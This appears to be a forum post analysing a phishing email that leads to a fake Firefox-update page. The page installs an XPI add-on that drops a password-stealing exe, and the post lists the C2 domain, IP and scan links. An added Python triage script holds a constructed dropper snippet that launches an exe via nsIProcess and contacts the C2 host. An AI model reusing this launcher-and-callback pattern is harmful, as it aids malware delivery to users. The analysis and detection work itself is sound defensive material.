I got the same mail as the other members, as you can see here. It looks like a simple phishing mail with the title "Suspicious sign in prevented", but it's more than that.
The email is probably being sent via a PHP mailer from a hacked server (wohnmobileunited.de).
If you hover your mouse over the button you will see a shortlink. I copied that link and it redirected me to a phishing/landing page that warns about an outdated Firefox and tries to install an XPI file by running it.
The XPI file is hosted on Dropbox.
Now I tried to download that add-on, renamed .xpi to .zip and extracted its contents.
Voila... There's an exe in it, which is a custom bot/password stealer that automatically downloads more files onto your PC.
But how does it get executed? The answer is in the JavaScript file.
It connects to a domain and some servers:
zuzuri.x64.me 79.172.242.88
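The triage step described above (rename the .xpi, unzip it, look for a bundled executable and for the script that launches it) can be automated. The script below is an added example and is not code from the original post or from the malware. It builds a constructed, harmless XPI in memory (a PE-looking stub and a bootstrap.js that only reuses the indicators listed above), then scans the archive: it identifies executables by their MZ magic bytes rather than by extension, flags Firefox extension APIs that can spawn a process or fetch from the network (nsIProcess, .launch(), XMLHttpRequest and so on), and pulls hostnames and IPs out of the script. Which APIs the real add-on used is not stated in the post; the list here is an assumption about what a dropper add-on would need.

```python
import io
import re
import zipfile

# Markers in extension JavaScript that a dropper would need (assumed list, not
# taken from the real sample). Substring match, so ".launch(" catches file.launch().
SUSPICIOUS_APIS = {
    "nsIProcess": "spawns an external process",
    ".launch(": "opens a file with its default handler",
    "nsILocalFile": "filesystem access",
    "XMLHttpRequest": "network request",
    "eval(": "dynamic code execution",
}
PE_MAGIC = b"MZ"
URL_HOST_RE = re.compile(r"https?://([^\s/'\"]+)", re.I)   # host part of any URL literal
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def build_sample_xpi() -> bytes:
    """Constructed sample: an XPI is just a ZIP. The 'exe' is a 2-byte MZ stub
    plus padding, not a real program; the JS is written for this example."""
    bootstrap_js = """
const {classes: Cc, interfaces: Ci} = Components;
var file = Cc["@mozilla.org/file/directory_service;1"]
             .getService(Ci.nsIProperties).get("TmpD", Ci.nsIFile);
file.append("update.exe");
var proc = Cc["@mozilla.org/process/util;1"].createInstance(Ci.nsIProcess);
proc.init(file);
proc.run(false, [], 0);
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://zuzuri.x64.me/gate.php", true);
var fallback = ["79.172.242.88"];
"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", "<RDF><Description/></RDF>")
        z.writestr("bootstrap.js", bootstrap_js)
        z.writestr("update.exe", PE_MAGIC + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 20)
    return buf.getvalue()


def triage_xpi(data: bytes) -> dict:
    """Scan every member of the XPI/ZIP and return what a first-pass analyst wants."""
    executables, scripts, hosts, ips = [], {}, set(), set()
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            content = z.read(info.filename)
            # Magic bytes, not the extension: a renamed payload still starts with MZ.
            if content[:2] == PE_MAGIC:
                executables.append(info.filename)
            if info.filename.lower().endswith((".js", ".jsm")):
                text = content.decode("utf-8", errors="replace")
                scripts[info.filename] = [api for api in SUSPICIOUS_APIS if api in text]
                hosts.update(h.lower() for h in URL_HOST_RE.findall(text))
                ips.update(IP_RE.findall(text))
    return {
        "executables": executables,
        "scripts": scripts,
        "hosts": sorted(hosts),
        "ips": sorted(ips),
    }


def is_dropper(report: dict) -> bool:
    """Heuristic verdict: a bundled PE plus a script able to launch it."""
    launchers = {"nsIProcess", ".launch("}
    can_launch = any(launchers & set(hits) for hits in report["scripts"].values())
    return bool(report["executables"]) and can_launch


if __name__ == "__main__":
    report = triage_xpi(build_sample_xpi())
    for name, hits in report["scripts"].items():
        print(f"{name}: " + ", ".join(f"{h} ({SUSPICIOUS_APIS[h]})" for h in hits))
    print("executables:", report["executables"])
    print("hosts:", report["hosts"], "ips:", report["ips"])
    print("dropper:", is_dropper(report))
```

Run it on a real .xpi by passing the file bytes to triage_xpi instead of build_sample_xpi(); the hosts and IPs it prints are the indicators to pivot on, as the post does next with the x64.me domain.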
X64.me is a free dynamic DNS domain (https://www.dnsdynamic.org).
Virus scan report (most antiviruses are unable to detect it as it's crypted): https://www.virustotal.com/en/file/02293d8b45e69f4dc0d69eb85553c5b6f97c47789689bc03bc0af729f4b25e0d/analysis/1396215000/
You can see the full analysis here: https://malwr.com/analysis/MjZhN2ExYzQ2MzBmNGI5ZDhiNjExNzM4NTQ1MGM1YjA/
Now when you try to find more info about that zazuri.x64.me domain, you will get scan links for other malware, including a .scr file and a PDF (PDF exploit):
https://malwr.com/analysis/MDIyZGFkNGNmMGM4NGFhZmFjMGM1OTdiMTY3YmJkNGM/
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~AutoIt-AGU/detailed-analysis.aspx